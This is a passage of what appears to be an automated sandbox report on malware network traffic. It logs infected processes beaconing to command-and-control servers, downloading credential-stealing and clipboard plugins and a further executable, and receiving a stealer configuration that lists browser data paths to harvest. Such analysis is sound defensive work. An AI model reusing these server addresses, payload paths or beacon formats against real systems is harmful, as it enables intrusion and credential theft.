                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49868 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:03.913847923 CEST | 66 | OUT | GET /enigma/Plugins/cred64.dll HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
Apr 19, 2024 03:30:04.155072927 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 1285632
                                                                                                                                                                                                                                      Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "65bbc024-139e00"
                                                                                                                                                                                                                                      Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 49869 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:03.929011106 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:04.177756071 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:04.178675890 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:04.436794043 CEST | 381 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 62 66 0d 0a 20 3c 63 3e 31 30 30 30 31 38 37 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 61 66 61 64 61 66 65 62 66 39 34 32 35 66 63 64 65 36 61 34 65 66 64 61 61 36 32 32 37 35 38 38 38 63 35 61 64 35 66 30 63 61 63 37 35 62 62 30 35 37 33 35 33 64 30 30 39 66 63 66 37 23 31 30 30 30 31 38 38 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 61 66 61 64 61 66 65 62 66 39 34 32 35 66 63 64 65 36 61 34 65 66 64 61 61 36 32 32 37 35 38 38 38 63 35 61 64 35 66 30 63 61 63 37 35 62 62 30 35 37 33 35 33 64 30 30 39 66 63 66 37 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: bf <c>1000187001+++97289d03516e941d3afadafebf9425fcde6a4efdaa62275888c5ad5f0cac75bb057353d009fcf7#1000188001+++97289d03516e941d3afadafebf9425fcde6a4efdaa62275888c5ad5f0cac75bb057353d009fcf7#<d>0
Apr 19, 2024 03:30:04.437968016 CEST | 57 | OUT | GET /lend/build12.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
Apr 19, 2024 03:30:04.686192989 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 97792
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:20:52 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621b8e4-17e00"
                                                                                                                                                                                                                                      Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 49871 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:04.130027056 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:04.373619080 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:30:04.376370907 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:04.624084949 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 49873 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:04.984601974 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:05.230546951 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 49877 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:05.485228062 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:05.742712975 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49879 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:06.107033014 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:06.355609894 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:30:06.361576080 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:06.613610983 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 49880 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:06.348500013 CEST | 183 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 31 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000187001&unit=246122658369
Apr 19, 2024 03:30:06.594388008 CEST | 193 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0
Apr 19, 2024 03:30:06.597733974 CEST | 140 | OUT | GET /lend/build12.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMT
                                                                                                                                                                                                                                      If-None-Match: "6621b8e4-17e00"
Apr 19, 2024 03:30:06.839776039 CEST | 191 | IN | HTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:20:52 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621b8e4-17e00"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49882 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:07.016180992 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:07.269551039 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 49883 | 147.185.221.19 | 30946 | 5608 | C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:07.220086098 CEST | 248 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Apr 19, 2024 03:30:07.630357981 CEST | 385 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Apr 19, 2024 03:30:19.786227942 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:30:19 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:30:20.095185041 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:30:19 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:30:24.843379974 CEST | 231 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate
Apr 19, 2024 03:30:33.719772100 CEST | 1248 | IN | HTTP/1.1 200 OK
Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:30:33 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFIL


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 49884 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:07.548664093 CEST | 66 | OUT | GET /enigma/Plugins/clip64.dll HTTP/1.1
Host: 193.233.132.167
Apr 19, 2024 03:30:07.795979977 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:07 GMT
Content-Type: application/octet-stream
Content-Length: 112128
Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
Connection: keep-alive
ETag: "65bbc023-1b600"
Accept-Ranges: bytes
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796178102 CEST1289INData Raw: a1 50 b9 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 ef 00 00 00 8b c2 51 50 e8 f7 43 00 00 83 c4 08 c7 05 60 b9 01 10 00 00 00 00 c7 05 64 b9 01 10 0f 00 00 00 c6 05 50 b9 01 10 00 0f 10 06 0f 11 05 50 b9 01
                                                                                                                                                                                                                                      Data Ascii: PArP#+QPC`dPP~Ff`FFUr(MBrI#+wzRQCEUEEEr(MBrI#+w1RQ;CtuZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796195984 CEST1289INData Raw: 00 00 c6 06 00 c7 45 fc 00 00 00 00 0f 57 c0 66 0f d6 45 e4 c7 45 ec 00 00 00 00 68 00 04 00 00 c7 45 d0 01 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 e8 09 3f 00 00 8b f8 b9 00 01 00 00 83 c8 ff 89 7d e4 83 c4 04 8d
                                                                                                                                                                                                                                      Data Ascii: EWfEEhEEEE?}UUE3EB@|E3M3U_9PvxErEt\xFNU;Ns~AFrDuEuQ
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796216011 CEST1289INData Raw: 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e4 00 00 00 0f 1f 40 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f 42 c8 83 7d 1c 10 8d 45 08 0f 43 45 08 51 03 c7
                                                                                                                                                                                                                                      Data Ascii: M3]@EEE;+;B}ECEQMP/]EE}jCEjPvNV];sAFrDuEuQ2EUr(MBrI#+wpRQ(9;}}
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796233892 CEST1289INData Raw: 45 fc 00 00 00 00 8d 4d c0 6a 24 68 48 8e 01 10 c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 e8 ce 2a 00 00 c6 45 fc 01 8b 45 18 85 c0 75 07 33 f6 e9 dc 00 00 00 33 ff 85 c0 0f 84 cd 00 00 00 66 90 c7 45 e8 00 00 00 00 c7 45 ec 0f 00 00
                                                                                                                                                                                                                                      Data Ascii: EMj$hHEEE*EEu33fEEE;u+;B}ECEQMPs*EEePN(EEP7(E0EUr,MBrI#+
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796252012 CEST1289INData Raw: 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 e8 ea 68 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 20 2b 01 10 64 a1 00 00 00 00 50 83 ec 40 a1 08 b0 01 10 33 c5 89 45 f0 56 50 8d 45 f4 64 a3 00 00 00 00 83 ec 18 c7 45 fc 01 00 00 00 8b cc 89
                                                                                                                                                                                                                                      Data Ascii: Y_^]hUjh +dP@3EVPEdEejhpAA{%EE ePV#EEPD#ME(0EEeP##EjhxAA%Ed0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796271086 CEST1289INData Raw: 10 f3 0f 7e 46 10 66 0f d6 05 90 b9 01 10 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 8b 55 cc 83 fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 aa 12 00 00 52 51 e8 a5 2a 00 00 83 c4
                                                                                                                                                                                                                                      Data Ascii: ~FfFFUr,MBrI#+RQ*uEePlEjhAAV E0EEEHE;0+;B}ECEMVP r.ArP
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796291113 CEST1289INData Raw: c4 30 c7 45 c8 00 00 00 00 c7 45 cc 0f 00 00 00 c6 45 b8 00 8d 48 ff b8 b0 b9 01 10 39 0d c0 b9 01 10 0f 42 0d c0 b9 01 10 83 3d c4 b9 01 10 10 51 0f 43 05 b0 b9 01 10 8d 4d b8 50 e8 99 1b 00 00 8b 0d c4 b9 01 10 83 f9 10 72 2e a1 b0 b9 01 10 41
                                                                                                                                                                                                                                      Data Ascii: 0EEEH9B=QCMPr.ArP#+wQPu%EU~EMfAA9B=RCPMt|
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.043592930 CEST1289INData Raw: fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d4 08 00 00 52 51 e8 b6 20 00 00 83 c4 08 83 ec 18 8b cc 89 65 d4 68 78 b8 01 10 e8 7f 14 00 00 83 ec 18 c6 45 fc 12 8b cc 68 c8 b9 01 10 e8 6c
                                                                                                                                                                                                                                      Data Ascii: r,MBrI#+RQ ehxEhlME0t|r.ArP#+dQP? ~FfFFUr,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 49885 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:07.719329119 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
